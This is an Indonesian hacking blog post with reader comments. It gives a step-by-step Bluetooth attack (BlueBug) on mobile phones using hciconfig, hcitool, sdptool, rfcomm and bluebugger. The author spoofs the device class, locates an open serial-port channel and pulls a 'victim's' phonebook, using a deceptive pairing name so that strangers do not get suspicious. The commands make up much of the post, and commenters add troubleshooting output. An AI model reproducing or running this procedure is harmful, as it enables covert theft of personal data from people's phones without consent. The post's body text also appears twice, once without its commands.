Bypass And Analysis Phone Bluetooth [PART 2]
Salam sahabat exploit =))
Berbeda dari postingan-postingan saya sebelumnya mengenai pengeksploitasian terhadap sistem operasi, pada postingan kali ini saya mencoba menganalisis sebuah Telepon Genggam yang secara umum di kenal dengan nama Hand Phone (HP)
cara ini saya bagi menjadii dua kategory, yaitu :
1. Configure Bluetooth Wizard (No Technic = DAMN)
Menghubungkan Sistim Operasi kita dengan Telepon Genggam yang menjadi target kita melalui bluetooth. kemudian mengatur settingan yg ada pada Bluetooth Wizard, kelihatannya sangat gampang bukan..?? namun ada satu hal yang pasti terlewatkan yaitu nomor PIN sebagai code persetujuan antara Bluetooth target dengan bluetooth yang ada pada sistem operasi kita,ini akan menimbulkan kecurigaan dan saya yakin korban pun tidaklah terlalu bodoh untuk melakukan hal ini, akan tetapi ini akan terlihat mudah jika korban kita adalah mereka yang kita kenali, kita hanya meminta korban untuk mengetikkan PIN tersebut, kemudian sistem operasi dan telepon genggam telah terhubung.
Q : Lalu bagai mana target kita adalah mereka yang tidak kita kenali,? dan tidak menimbulkan kecurigaan terhadap korban. mustahil sistem operasi kita akan terhubung dengan bluetooth korban, ini sangat di luar nalar bukan ???
A : Disini lah letak kecerdasan seorang Attacker, dengan memanfaatkan tool-tool yang ada serta teknik dan pengalaman-pengalamannya ia akan membuat menjadi lebih sederhana, bahkan kaum awam pun tidak sanggup mencerna dengan akal sehat.
2. Through the serial port to configure bluetooth =))
Equipments :
1. Hciconfig
2. Hcitool
3. Sdptool
4. Rfcomm
5. Bluebugger
6. Wammu
pada Operating System yang saya gunakan ( Kali Linux 1.5 )secara umum equipment 1-4 telah terinstall.
Download Bluebugger :
http://www.mobile-download.net/Soft/Soft_5242.htm
Install Wammu :
First Step :
mengaktifkan hci0 perangkap bluetooth.
selanjutnya kita cek class device untuk hci0 :
terlihat pada gambar diatas nilai Class masih menggunakan nilai dari default,
selanjutnya saya mengubah nilai class menjadi : 0x050204
:
0x050204 : saya mengatur class device menjadi "050204"
Kemudian saya mengecek class device bluetooth yang ada dapa sistem operasi yang saya gunakan :
maka hasil output terlihat menjadi seperti ini :
Tahap selanjutnya melakukan percarian terhadap device Bluetooth yang aktif :
Ada beberapa perangkat bluetooth yang terekam, namun agar tidak ada pihak yang merasa di rugikan dalam analisis yg saya lakukan maka saya mengambil target saya 00:BD:3A:CD:B9:48 itu adalah perangkat bluetooth yang ada pada Telepon Genggam saya.
lanjut ke tahap berikutnya :
Browse = Browse all available services
00:BD:3A:CD:B9:48 = Mac yang menjadi target saya
NOTE : ada banyak service name yg terdeksi, namun yang kita ambil hanya service name yg memili Serial Port :)
perhatikan bagian yg saya blok, terlihat memiliki Serial Port dan RFCOMM serta channel 15 kemungkinan besar pengujian ini berhasil =))
selanjutnya kita mengatur perangkat bluetooth transfer protolkol :
selanjutnya menjalankan service bluetooth:
selanjutnya kita melakukan connection terhadap bluetooth korban :
-m = Name to use when connecting
-c = Channel to use (channel 15 perhatikan channel yg ada pada gambar diatas sebelumnya)
-a = Bluetooth address of target
DONE =))
sekarang kita sistem operasi yang saya gunakan telah terhubung dengat Telepon Genggam korban.
selanjutnya kita memanfaatkan Wammu tools (Mobile Phone manager)
selanjutnya untuk configurasi anda bisa lihat pada postingan saya sebelumnya http://h2-exploitation.blogspot.com/2013/09/configuration-wammu-connection-bluetooth.html
Regards:
Hidemichi-Hiroyuki a.k.a [H2]
Berbeda dari postingan-postingan saya sebelumnya mengenai pengeksploitasian terhadap sistem operasi, pada postingan kali ini saya mencoba menganalisis sebuah Telepon Genggam yang secara umum di kenal dengan nama Hand Phone (HP)
cara ini saya bagi menjadii dua kategory, yaitu :
1. Configure Bluetooth Wizard (No Technic = DAMN)
Menghubungkan Sistim Operasi kita dengan Telepon Genggam yang menjadi target kita melalui bluetooth. kemudian mengatur settingan yg ada pada Bluetooth Wizard, kelihatannya sangat gampang bukan..?? namun ada satu hal yang pasti terlewatkan yaitu nomor PIN sebagai code persetujuan antara Bluetooth target dengan bluetooth yang ada pada sistem operasi kita,ini akan menimbulkan kecurigaan dan saya yakin korban pun tidaklah terlalu bodoh untuk melakukan hal ini, akan tetapi ini akan terlihat mudah jika korban kita adalah mereka yang kita kenali, kita hanya meminta korban untuk mengetikkan PIN tersebut, kemudian sistem operasi dan telepon genggam telah terhubung.
Q : Lalu bagai mana target kita adalah mereka yang tidak kita kenali,? dan tidak menimbulkan kecurigaan terhadap korban. mustahil sistem operasi kita akan terhubung dengan bluetooth korban, ini sangat di luar nalar bukan ???
A : Disini lah letak kecerdasan seorang Attacker, dengan memanfaatkan tool-tool yang ada serta teknik dan pengalaman-pengalamannya ia akan membuat menjadi lebih sederhana, bahkan kaum awam pun tidak sanggup mencerna dengan akal sehat.
2. Through the serial port to configure bluetooth =))
Equipments :
1. Hciconfig
2. Hcitool
3. Sdptool
4. Rfcomm
5. Bluebugger
6. Wammu
pada Operating System yang saya gunakan ( Kali Linux 1.5 )secara umum equipment 1-4 telah terinstall.
Download Bluebugger :
http://www.mobile-download.net/Soft/Soft_5242.htm
Install Wammu :
# apt-get install wammu
First Step :
mengaktifkan hci0 perangkap bluetooth.
# hciconfig hci0 up
selanjutnya kita cek class device untuk hci0 :
# hciconfig hci0 class
terlihat pada gambar diatas nilai Class masih menggunakan nilai dari default,
selanjutnya saya mengubah nilai class menjadi : 0x050204
:
# hciconfig hci0 class 0x050204
0x050204 : saya mengatur class device menjadi "050204"
Kemudian saya mengecek class device bluetooth yang ada dapa sistem operasi yang saya gunakan :
# hciconfig -a
maka hasil output terlihat menjadi seperti ini :
Tahap selanjutnya melakukan percarian terhadap device Bluetooth yang aktif :
# hcitool scan
Ada beberapa perangkat bluetooth yang terekam, namun agar tidak ada pihak yang merasa di rugikan dalam analisis yg saya lakukan maka saya mengambil target saya 00:BD:3A:CD:B9:48 itu adalah perangkat bluetooth yang ada pada Telepon Genggam saya.
lanjut ke tahap berikutnya :
# sdptool browse 00:BD:3A:CD:B9:48
Browse = Browse all available services
00:BD:3A:CD:B9:48 = Mac yang menjadi target saya
NOTE : ada banyak service name yg terdeksi, namun yang kita ambil hanya service name yg memili Serial Port :)
perhatikan bagian yg saya blok, terlihat memiliki Serial Port dan RFCOMM serta channel 15 kemungkinan besar pengujian ini berhasil =))
selanjutnya kita mengatur perangkat bluetooth transfer protolkol :
# rfcomm bind rfcomm0 00:BD:3A:CD:B9:48
selanjutnya menjalankan service bluetooth:
# /etc/init.d/bluetooth start
selanjutnya kita melakukan connection terhadap bluetooth korban :
# ./bluebugger -m "Please Enter [H2] To Accept" -c 15 -a 00:BD:3A:CD:B9:48 phonebook
-m = Name to use when connecting
-c = Channel to use (channel 15 perhatikan channel yg ada pada gambar diatas sebelumnya)
-a = Bluetooth address of target
DONE =))
sekarang kita sistem operasi yang saya gunakan telah terhubung dengat Telepon Genggam korban.
selanjutnya kita memanfaatkan Wammu tools (Mobile Phone manager)
selanjutnya untuk configurasi anda bisa lihat pada postingan saya sebelumnya http://h2-exploitation.blogspot.com/2013/09/configuration-wammu-connection-bluetooth.html
Regards:
Hidemichi-Hiroyuki a.k.a [H2]
Referensi buat yang gak bisa Compile Bluea install ini :
ReplyDeletesudo apt-get install bluez-utils bluez-compat bluez-hcidump checkinstall libusb-dev libbluetooth-dev joystick
Thanks :)
DeleteKalau hasilnya begini bagaimana?
ReplyDeleteroot@Sector1337:/home/bugtraq/Unduhan/bluebugger-0.1# ./bluebugger -m "Message" -c 4 -a 00:24:7D:9C:E1:5C phonebook
bluebugger 0.1 ( MaJoMu | www.codito.de )
-----------------------------------------
Target Device: '00:24:7D:9C:E1:5C'
Target Name: 'Nonmae'
Cannot open '/dev/rfcomm0': Connection refused
root@Sector1337:/home/bugtraq/Unduhan/bluebugger-0.1#
coba di perhatikan channell-nya kemudian serial portnya kebuka atau tidak.
ReplyDeletepilih service yang memiliki serial port yang terbuka kemudian lihat pada channel berapa.?
perhatikan lagi pada gambar yang saya blok diatas :)